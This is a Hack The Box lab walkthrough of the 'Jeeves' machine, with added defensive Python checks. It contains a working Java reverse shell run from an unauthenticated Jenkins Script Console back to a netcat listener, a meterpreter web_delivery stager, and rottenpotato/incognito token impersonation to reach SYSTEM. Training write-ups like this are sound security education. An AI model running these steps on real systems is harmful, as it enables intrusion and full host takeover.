[hackthebox]Jeeves


Introduction

Jeeves is a machine rated easy. It is compromised by abusing an unauthenticated Jenkins dashboard: a Java reverse shell is run from Jenkins' Script Console (where Groovy scripts can be run for troubleshooting), and the reverse connection comes back to my netcat listener.

Once the reverse connection is established, I move to the user's desktop to get the user flag.

Checking the user's privileges shows SeImpersonatePrivilege, which is the condition needed for rottenpotato to elevate to “NT Authority\System”.

Next is privilege escalation with rottenpotato. rottenpotato works together with incognito, which is easily loaded if the shell is a meterpreter; the video on how to do the rottenpotato attack can be found here.

After the root flag is obtained, the last step is to exit meterpreter and clean up from another connection by deleting the uploaded rottenpotato; to delete it, the process first has to be killed forcefully with taskkill /PID <pid of rottenpotato>.

nmap

nmap -A -p- -oN jeeves -vvv 10.10.10.63

Increasing send delay for 10.10.10.63 from 0 to 5 due to 61 out of 202 dropped probes since last increase.
Nmap scan report for 10.10.10.63
Host is up, received syn-ack (0.17s latency).
Scanned at 2020-05-02 21:58:07 +08 for 595s
Not shown: 65531 filtered ports
Reason: 65531 no-responses
PORT      STATE SERVICE      REASON  VERSION
80/tcp    open  http         syn-ack Microsoft IIS httpd 10.0
| http-methods: 
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Ask Jeeves
135/tcp   open  msrpc        syn-ack Microsoft Windows RPC
445/tcp   open  microsoft-ds syn-ack Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
50000/tcp open  http         syn-ack Jetty 9.4.z-SNAPSHOT
|_http-server-header: Jetty(9.4.z-SNAPSHOT)
|_http-title: Error 404 Not Found
Service Info: Host: JEEVES; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 5h03m13s, deviation: 0s, median: 5h03m13s
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 55172/tcp): CLEAN (Timeout)
|   Check 2 (port 48223/tcp): CLEAN (Timeout)
|   Check 3 (port 55682/udp): CLEAN (Timeout)
|   Check 4 (port 48293/udp): CLEAN (Timeout)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
|_smb-os-discovery: ERROR: Script execution failed (use -d to debug)
| smb-security-mode: 
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2020-05-02T19:10:36
|_  start_date: 2020-05-02T18:53:29

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat May  2 22:08:02 2020 -- 1 IP address (1 host up) scanned in 595.85 seconds

Directory enumeration with gobuster on port 50000

gobuster dir -u http://10.10.10.63:50000 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50 -o web_enum

The result is /askjeeves (Status: 302)

Visiting http://10.10.10.63:50000/askjeeves brings up the Jenkins dashboard.

Clicking on “Manage Jenkins”, I found “Script Console”.
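The security-relevant point here is that this Jenkins instance lets anyone reach the Script Console without logging in. The Python check below is an added example, not code from this write-up or from Jenkins: it is the kind of verification an administrator runs against their own instance after turning on authentication. It requests /script under the assumed base path /askjeeves without following redirects and reports whether the script editor form comes back to an anonymous client. To run offline it starts a small constructed mock of both a misconfigured and a hardened Jenkins; the form marker name="script" is an assumption about the console's markup.

```python
"""Audit check for the Jeeves finding: can an anonymous client reach the
Jenkins Script Console?  Added example, not code from the write-up or from
Jenkins.  The base path /askjeeves and the form marker are assumptions."""
import http.server
import threading
import urllib.error
import urllib.request

# Jenkins renders the console as a form with a <textarea name="script">
# (assumed marker; adjust if your Jenkins version differs).
SCRIPT_FORM_MARKER = b'name="script"'


class _NoRedirect(urllib.request.HTTPRedirectHandler):
    """Refuse to follow redirects, so a bounce to /login surfaces as an error."""
    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None


def script_console_exposed(base_url, timeout=5):
    """True if GET <base_url>/script returns the script editor to an
    unauthenticated client; False if Jenkins answers 403 or redirects to
    its login page.  Anything else is treated as not exposed."""
    url = base_url.rstrip("/") + "/script"
    opener = urllib.request.build_opener(_NoRedirect())
    try:
        with opener.open(url, timeout=timeout) as resp:
            return resp.status == 200 and SCRIPT_FORM_MARKER in resp.read()
    except urllib.error.HTTPError:
        return False  # 403 Forbidden or 302 -> /login: authentication enforced


# --- constructed mock Jenkins so the check runs offline -------------------
class _MockJenkins(http.server.BaseHTTPRequestHandler):
    anonymous_admin = True  # overridden per server instance in _serve()

    def do_GET(self):
        if not self.path.endswith("/script"):
            self.send_response(404)
            self.end_headers()
        elif self.anonymous_admin:  # misconfigured: console served to anyone
            body = b'<html><form><textarea name="script"></textarea></form></html>'
            self.send_response(200)
            self.send_header("Content-Length", str(len(body)))
            self.end_headers()
            self.wfile.write(body)
        else:  # hardened: anonymous users are bounced to the login page
            self.send_response(302)
            self.send_header("Location", "/login?from=%2Faskjeeves%2Fscript")
            self.end_headers()

    def log_message(self, *args):  # keep the demo quiet
        pass


def _serve(anonymous_admin):
    handler = type("Mock", (_MockJenkins,), {"anonymous_admin": anonymous_admin})
    srv = http.server.HTTPServer(("127.0.0.1", 0), handler)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv, f"http://127.0.0.1:{srv.server_address[1]}/askjeeves"


def demo():
    """Run the check against a misconfigured and a hardened mock instance."""
    results = {}
    for label, open_console in (("open", True), ("locked", False)):
        srv, base = _serve(open_console)
        try:
            results[label] = script_console_exposed(base)
        finally:
            srv.shutdown()
            srv.server_close()
    return results


if __name__ == "__main__":
    print(demo())  # {'open': True, 'locked': False}
```

Redirects are deliberately not followed: following one would land on the login page with a 200 status, and a naive status-code check would then misreport a hardened instance as open.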

Reverse shell connection

I borrowed the Java reverse shell from https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md#java and changed the port and IP address.

String host = "10.10.14.25";   // IP of my netcat listener
int port = 1337;               // port of the listener (nc -lvnp 1337)
String cmd = "cmd.exe";
Process p = new ProcessBuilder(cmd).redirectErrorStream(true).start();
Socket s = new Socket(host, port);
InputStream pi = p.getInputStream(), pe = p.getErrorStream(), si = s.getInputStream();
OutputStream po = p.getOutputStream(), so = s.getOutputStream();
// pump bytes in both directions until the socket closes or cmd.exe exits
while (!s.isClosed()) {
    while (pi.available() > 0) so.write(pi.read());
    while (pe.available() > 0) so.write(pe.read());
    while (si.available() > 0) po.write(si.read());
    so.flush();
    po.flush();
    Thread.sleep(50);
    try { p.exitValue(); break; } catch (Exception e) {}
}
p.destroy();
s.close();


Before running the script in Jeeves' Script Console, I set up a netcat listener: nc -lvnp 1337


Get the user flag


User’s privilege

The user has SeImpersonatePrivilege, which can be exploited with rottenpotato.exe.
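The finding above comes from reading whoami /priv output by eye. As an added example that is not part of the write-up, here is a small Python triage helper a defender can run over saved whoami /priv output from service accounts to flag the privileges that make potato-style token impersonation possible; the sample output is constructed, and the list of flagged privileges is my own assumption rather than something the page states.

```python
"""Triage helper: flag token-impersonation privileges in `whoami /priv`
output.  Added example, not from the write-up; the sample output is
constructed and the flagged-privilege list is my assumption."""
import re

# Privileges that let a process adopt another account's token, which is
# what potato-style escalations rely on (assumed list, not from the page).
IMPERSONATION_PRIVS = {"SeImpersonatePrivilege", "SeAssignPrimaryTokenPrivilege"}

# Constructed sample of `whoami /priv` output for a service-style account.
SAMPLE_WHOAMI_PRIV = """\
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeShutdownPrivilege           Shut down the system                      Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
"""

# privilege name, free-text description, then Enabled/Disabled at end of line
PRIV_LINE_RE = re.compile(r"^(Se\w+Privilege)\s+(.*?)\s+(Enabled|Disabled)\s*$")


def parse_privileges(text):
    """Map privilege name -> 'Enabled' | 'Disabled' from whoami /priv output."""
    privs = {}
    for line in text.splitlines():
        m = PRIV_LINE_RE.match(line.strip())
        if m:
            privs[m.group(1)] = m.group(3)
    return privs


def impersonation_risk(text):
    """Sorted names of enabled impersonation privileges.  A non-empty result
    means the account could be escalated to SYSTEM the way the write-up
    shows, so the service should run under a less privileged identity."""
    return sorted(name for name, state in parse_privileges(text).items()
                  if name in IMPERSONATION_PRIVS and state == "Enabled")


if __name__ == "__main__":
    print(impersonation_risk(SAMPLE_WHOAMI_PRIV))  # ['SeImpersonatePrivilege']
```

Only enabled privileges are reported; a disabled privilege still sits in the token and can be re-enabled by the holder, so a stricter audit would flag it too.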

Get meterpreter connection

I need incognito to execute rottenpotato in the background, and the easiest way to get it is to load incognito from meterpreter.

To get a meterpreter session I use exploit/multi/script/web_delivery to deliver the stager to Jeeves.


I used these settings for the exploit. Target 2 specifies PowerShell; the default payload is a Python script, so after setting target 2 I have to change the payload to payload/windows/meterpreter/reverse_tcp, which is compatible with the PowerShell target.

Jeeves runs Windows 10 Pro 64-bit, but I could not get the x64 reverse_tcp payload delivered; the good old payload/windows/meterpreter/reverse_tcp was delivered fine.


I copy and paste the PowerShell payload into the nc session.

Privilege escalation

I had already downloaded rottenpotato, so I upload it to Jeeves. I also load incognito; either load incognito or use incognito works.

Calling help lists the incognito commands, including list_tokens and impersonate_token.

The current user has no tokens to impersonate, but after rottenpotato is executed the “NT Authority\System” token will be available for impersonation.

The options for execute are shown in its help output.

execute -Hc -f /users/kohsuke/downloads/rottenpotato.exe runs rottenpotato hidden in the background and creates a channel for interacting with incognito.

Running list_tokens -u now shows a token available to impersonate.

Run the incognito command impersonate_token "NT AUTHORITY\SYSTEM".

There is a small twist: hm.txt does not directly reveal the root flag.

I spawn a shell from meterpreter and run dir /R, which reveals whether any files have an alternate data stream.

Read the alternate stream's content: more < hm.txt:root.txt
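dir /R is the cmd.exe way of listing alternate data streams, and it is also how a defender hunts for data hidden in them. The Python parser below is an added example, not part of the write-up: it reads saved dir /R output and returns every named $DATA stream, skipping the Zone.Identifier stream that Windows attaches to downloaded files. The listing it parses is constructed; the hm.txt:root.txt stream mirrors the finding above, and the other entries and sizes are invented.

```python
"""Parse `dir /R` output for alternate data streams.  Added example, not
from the write-up; the listing below is constructed (hm.txt:root.txt
mirrors the finding above, everything else is invented)."""
import re

SAMPLE_DIR_R = """\
 Volume in drive C has no label.
 Volume Serial Number is 0000-0000

 Directory of C:\\Users\\Administrator\\Desktop

11/08/2017  09:05 AM    <DIR>          .
11/08/2017  09:05 AM    <DIR>          ..
12/24/2017  02:51 AM                36 hm.txt
                                    34 hm.txt:root.txt:$DATA
11/08/2017  09:05 AM             1,024 notes.lnk
                                    26 notes.lnk:Zone.Identifier:$DATA
               2 File(s)          1,060 bytes
               2 Dir(s)  2,000,000,000 bytes free
"""

# An ADS line in dir /R output carries no date/time: just the size,
# then <file>:<stream>:$DATA.  Sizes may contain thousands separators.
STREAM_RE = re.compile(r"^\s+(\d[\d,]*)\s+(.+?):([^:\\/]+):\$DATA\s*$")

# Mark-of-the-Web stream Windows adds to downloaded files; benign by itself.
BENIGN_STREAMS = {"Zone.Identifier"}


def find_alternate_streams(dir_output, include_benign=False):
    """Return a list of (file_name, stream_name, size_bytes) tuples for
    every alternate data stream in the listing, benign ones excluded
    unless include_benign is set."""
    found = []
    for line in dir_output.splitlines():
        m = STREAM_RE.match(line)
        if not m:
            continue
        size, file_name, stream = m.groups()
        if stream in BENIGN_STREAMS and not include_benign:
            continue
        found.append((file_name, stream, int(size.replace(",", ""))))
    return found


if __name__ == "__main__":
    print(find_alternate_streams(SAMPLE_DIR_R))  # [('hm.txt', 'root.txt', 34)]
```

Regular file lines start with a date in column one, so the leading-whitespace anchor in STREAM_RE is what keeps them from being mistaken for stream entries.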

Clean up

When I used tasklist /svc, rottenpotato was not displayed, which is intended due to the execute -H option.
